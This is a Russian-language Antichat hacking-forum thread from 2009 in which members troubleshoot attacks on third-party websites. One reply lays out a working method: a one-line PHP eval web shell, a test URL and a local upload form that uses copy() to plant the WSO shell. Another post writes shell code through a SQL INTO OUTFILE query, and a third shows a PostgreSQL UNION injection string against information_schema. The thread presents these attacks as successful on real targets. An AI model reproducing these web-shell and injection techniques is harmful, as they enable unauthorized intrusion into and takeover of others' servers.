HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 945 из 2422 « Первая < 445845895935 941 942 943 944 945 946 947 948 949 955995104514451945 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 25.10.2009, 17:10
Ins3t
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
С нами: 8850336

Репутация: 330
По умолчанию
Цитата:
Сообщение от M1ks  
outfile работает, но экранируется, админка на все есть.. нужно файл както залить, лью через пхпмайадм
омг, что значит работает, но екранизируется?
что экранизируеться?
излагай проблему подробно, дабы тебе смогли помочь.
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 25.10.2009, 17:11
M1ks
Участник форума
Регистрация: 23.08.2007
Сообщений: 157
С нами: 9851463

Репутация: 19
По умолчанию
да, можно... кмд шел даже залил
там стоит
magic_quotes_sybase = On
добавляются \ в кавычках, я писал выше
 
Ответить с цитированием

  #3  
Старый 25.10.2009, 17:16
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию
Цитата:
Сообщение от M1ks  
да, можно... кмд шел даже залил
там стоит
magic_quotes_sybase = On
добавляются \ в кавычках, я писал выше
тогда лей wso без html-вставок, последняя версия:

https://forum.antichat.ru/threadedpost1624918.html#post1624918

1. Заливаешь такой шелл:

<?eval(stripslashes($_GET[e]));?>

2. Проверяешь:

Код:
http://site.com/имя_твоего_шелла&e=phpinfo();
или

Код:
http://site.com/имя_твоего_шелла?e=phpinfo();
по разному бывает

3. У себя на компе такую локальную форму творишь (обзываешь .html):

Код:
<form action=http://site.com/имя_твоего_шелла&e=copy($_FILES[file][tmp_name],$_GET[aa]);&aa=/www/тут_полный_абсолютный_путь_до_папки_с_правами_на_запись/shell.php
 method=post enctype=multipart/form-data>
<input type=file name=file><br> 
<input type=submit value=Загрузить><br>
</form>
4. Запускаешь и льешь wso, всё
Последний раз редактировалось Pashkela; 25.10.2009 в 17:19..
 
Ответить с цитированием

  #4  
Старый 25.10.2009, 17:13
M1ks
Участник форума
Регистрация: 23.08.2007
Сообщений: 157
С нами: 9851463

Репутация: 19
По умолчанию
записывается, но когда пытаюсь wso залить шел, ошибки
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in ..\..\..\..\results.php on line 1
итд
 
Ответить с цитированием

  #5  
Старый 25.10.2009, 17:15
keng
Познающий
Регистрация: 09.04.2008
Сообщений: 79
С нами: 9520453

Репутация: 124
По умолчанию
Цитата:
Сообщение от M1ks  
записывается, но когда пытаюсь wso залить шел, ошибки
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in ..\..\..\..\results.php on line 1
итд
Покажи запрос, которым заливаешь. Возможно, лишний слеш поставил.
 
Ответить с цитированием

  #6  
Старый 25.10.2009, 17:18
M1ks
Участник форума
Регистрация: 23.08.2007
Сообщений: 157
С нами: 9851463

Репутация: 19
По умолчанию
SELECT 'код шелла' FROM `table` INTO OUTFILE 'путь'
 
Ответить с цитированием

  #7  
Старый 25.10.2009, 17:25
M1ks
Участник форума
Регистрация: 23.08.2007
Сообщений: 157
С нами: 9851463

Репутация: 19
По умолчанию
Pashkela.
Спасибо, получилось
 
Ответить с цитированием

  #8  
Старый 25.10.2009, 19:23
GenTao
Участник форума
Регистрация: 10.10.2009
Сообщений: 133
С нами: 8730155

Репутация: -1
По умолчанию
Код:
ERROR: UNION types double precision and character varying cannot be matched
БД: PostgreSql. Как проводить запросы в таком случае ?
 
Ответить с цитированием

  #9  
Старый 25.10.2009, 19:28
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами: 10274726

Репутация: 1917


По умолчанию
Цитата:
Сообщение от GenTao  
Код:
ERROR: UNION types double precision and character varying cannot be matched
БД: PostgreSql. Как проводить запросы в таком случае ?
в PG в union надо соблюсти не только количество полей но и их типы
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #10  
Старый 25.10.2009, 19:33
GenTao
Участник форума
Регистрация: 10.10.2009
Сообщений: 133
С нами: 8730155

Репутация: -1
По умолчанию
я cast() уже перепробовал.Какой конкретный запрос ?

1+union+select+table_name+from+information_schema. tables+limit+1+offset+1----

Вышла такая хня.В ascii переводить чтоли.
Последний раз редактировалось GenTao; 25.10.2009 в 19:35..
 
Ответить с цитированием
Ответ
Страница 945 из 2422 « Первая < 445845895935 941 942 943 944 945 946 947 948 949 955995104514451945 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.